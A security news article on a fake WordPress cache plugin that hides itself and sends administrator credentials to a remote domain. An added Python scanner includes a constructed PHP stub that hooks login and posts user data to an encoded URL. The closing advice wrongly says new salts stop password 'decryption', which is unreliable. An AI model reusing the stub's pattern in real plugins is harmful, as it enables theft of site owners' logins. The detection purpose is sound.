WordPress Admins Cautioned About Fake Cache Plugin Stealing Admin Credentials
A newly identified malicious plugin, dubbed “wp-runtime-cache,” has been discovered targeting WordPress sites with a sophisticated method to steal admin credentials.
Disguised as a caching plugin, this malware lurks in the wp-content/plugins directory, evading detection by hiding from the WordPress admin panel’s plugin list.
Unlike legitimate caching plugins that typically offer visible settings or management options within the wp-admin interface, this fake plugin offers no such features, raising immediate suspicion during routine malware scans.
On closer inspection, the plugin directory contains just a single file, wp-runtime-cache.php, a stark contrast to the multi-file structure of authentic plugins, signaling malicious intent.

How the Malware Operates
Technical analysis reveals a chillingly effective mechanism. The plugin activates during site login events via the add_action('wp_login', 'octopusJson50286', 10, 2) hook, capturing user input as the site loads.
It specifically targets high-privilege users by checking for roles like “manage_options” (admin-level) and “edit_pages” (editor-level), decoded from embedded base64 strings.
If the logged-in user matches these roles, the plugin constructs an array of sensitive data, including usernames and passwords, and exfiltrates it to a remote server at https://woocommerce-check[.]com/report-to using WordPress’s built-in wp_remote_post function.
The plugin further conceals its presence with a secondary function triggered by add_action('pre_current_active_plugins', 'pbes2PITR0339'), which manipulates the plugin list to remain invisible to non-malicious users.
Code obfuscation techniques, such as random variable names like infiltrateDocumentStore0460 and base64-encoded content, are employed, distinguishing it from legitimate obfuscation used in premium plugins for license protection.
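As an added example (not code from the article or from the researchers who analysed the sample), the following Python script scans a wp-content/plugins tree for the traits described above: a plugin directory holding a single PHP file, a pre_current_active_plugins hook that rewrites the plugin list, and a wp_login hook paired with wp_remote_post and base64_decode. The plugin tree it scans is constructed for the demo and is not the real malware.

```python
import re
import tempfile
from pathlib import Path

# Traits named in the article, expressed as regexes over plugin PHP source.
INDICATORS = {
    "hides_from_plugin_list": re.compile(r"add_action\(\s*['\"]pre_current_active_plugins['\"]"),
    "hooks_login": re.compile(r"add_action\(\s*['\"]wp_login['\"]"),
    "remote_post": re.compile(r"\bwp_remote_post\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
}

def scan_plugin_dir(plugin_dir: Path) -> dict:
    """Structural plus content indicators for one plugin directory, with a verdict."""
    php_files = list(plugin_dir.rglob("*.php"))
    hits = set()
    for f in php_files:
        text = f.read_text(errors="ignore")
        hits.update(name for name, rx in INDICATORS.items() if rx.search(text))
    # Rewriting the plugin list is a red flag alone; so is a login hook plus an outbound POST.
    suspicious = "hides_from_plugin_list" in hits or {"hooks_login", "remote_post"} <= hits
    return {"single_file": len(list(plugin_dir.iterdir())) == 1 and len(php_files) == 1,
            "indicators": sorted(hits), "suspicious": suspicious}

def scan_plugins_root(root: Path) -> dict:
    return {d.name: scan_plugin_dir(d) for d in sorted(root.iterdir()) if d.is_dir()}

# Constructed sample (not the real malware): a single-file plugin wired with the
# hook and variable names quoted in the article, beside a benign multi-file one.
FAKE_CACHE_PHP = """<?php
add_action('wp_login', 'octopusJson50286', 10, 2);
add_action('pre_current_active_plugins', 'pbes2PITR0339');
function octopusJson50286($login, $user) {
    wp_remote_post(base64_decode($infiltrateDocumentStore0460), array('body' => $user));
}
"""

def build_sample_tree(root: Path) -> None:
    (root / "wp-runtime-cache").mkdir()
    (root / "wp-runtime-cache" / "wp-runtime-cache.php").write_text(FAKE_CACHE_PHP)
    (root / "real-cache").mkdir()
    (root / "real-cache" / "real-cache.php").write_text("<?php\nadd_action('init', 'rc_init');\n")
    (root / "real-cache" / "readme.txt").write_text("benign multi-file plugin\n")

def demo() -> dict:
    """Build the sample tree in a temp dir and return the per-plugin reports."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(Path(tmp))
        return scan_plugins_root(Path(tmp))
```

Point scan_plugins_root at a real wp-content/plugins path to run it on a site; a hit on hides_from_plugin_list deserves a manual read of the file regardless of the other indicators.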

The domain used for data exfiltration, registered on October 27, 2024, in Arkansas, US, with a Hong Kong-based abuse contact number (+852.68584411), suggests a deliberate attempt to obscure the attackers’ origins.
Such freshly registered domains are a common tactic among cybercriminals to bypass reputation-based detection systems.
Protecting Your WordPress Site
According to the report, this attack underscores the critical need for proactive security measures. WordPress administrators must regularly audit plugins and user accounts, leveraging server-side scanners or security plugins like Sucuri to detect unauthorized file uploads.
Implementing two-factor authentication (2FA) and IP-based login restrictions can thwart unauthorized access even if credentials are compromised.
Additionally, updating WordPress salts in the wp-config.php file post-compromise is vital: new salts, easily generated via WordPress.org’s Salt Generator, invalidate previously captured hashed passwords, preventing attackers from decrypting them.
This incident serves as a stark reminder of the evolving sophistication of cyber threats and the importance of layered defenses to safeguard critical site access.
Staying vigilant and maintaining updated security protocols can mean the difference between a secure site and a catastrophic breach.